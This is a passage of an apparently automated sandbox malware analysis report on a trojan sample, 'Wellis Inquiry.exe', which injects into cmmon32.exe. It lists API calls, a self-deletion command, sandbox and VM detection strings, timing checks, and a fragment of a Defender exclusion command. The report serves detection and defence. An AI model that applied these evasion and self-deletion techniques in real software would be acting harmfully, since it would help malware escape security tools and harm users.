          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F6E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047ADFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047AE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FA830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046EB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046DF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F99BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0478FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB236
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794AEF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FAB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0477CB4F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FA309
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047823E3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047903DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470ABD8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470138B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3BA2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3CBBB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3C95D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D22FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D28C80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D28C7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D22D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D22D87
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: String function: 011BB150 appears 54 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 046DB150 appears 136 times
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041868A NtReadFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041870A NtClose,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011FB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011FA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011FAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011FA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011FA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D38690 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D387C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D38710 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D385E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3868A NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3870A NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D385DA NtCreateFile,
          Source: Wellis Inquiry.exeBinary or memory string: OriginalFilename vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000000.00000002.673472401.00000000083A0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exeBinary or memory string: OriginalFilename vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000003.00000002.747172824.00000000031A9000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exeBinary or memory string: OriginalFilenameMutexAccessRu.exe8 vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Wellis Inquiry.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Wellis Inquiry.exe 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wellis Inquiry.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@9/6
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Wellis Inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Wellis Inquiry.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Wellis Inquiry.exe, cmmon32.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Wellis Inquiry.exe, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.Wellis Inquiry.exe.ff0000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.Wellis Inquiry.exe.ff0000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.Wellis Inquiry.exe.6a0000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.Wellis Inquiry.exe.6a0000.1.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_004160E3 push 21204C73h; retf
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_004091C6 push eax; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00416278 push ebp; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041621F push ebp; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0040EE6C push edx; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00415EAC push FFFFFFABh; iretd
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041B7D5 push eax; ret
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0120D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0472D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D36278 push ebp; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3621F push ebp; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D360E3 push 21204C73h; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3B88C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3B822 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3B82B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D291C6 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D35EAC push FFFFFFABh; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D2EE6C push edx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3B7D5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93897204497

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.339002c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Wellis Inquiry.exe PID: 7036, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000002D2899E second address: 0000000002D289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe TID: 7040Thread sleep time: -40370s >= -30000s
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe TID: 7064Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2848Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6880Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeThread delayed: delay time: 40370
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeThread delayed: delay time: 922337203685477
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.679441377.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.709634080.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.679441377.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.672692112.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.697371801.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
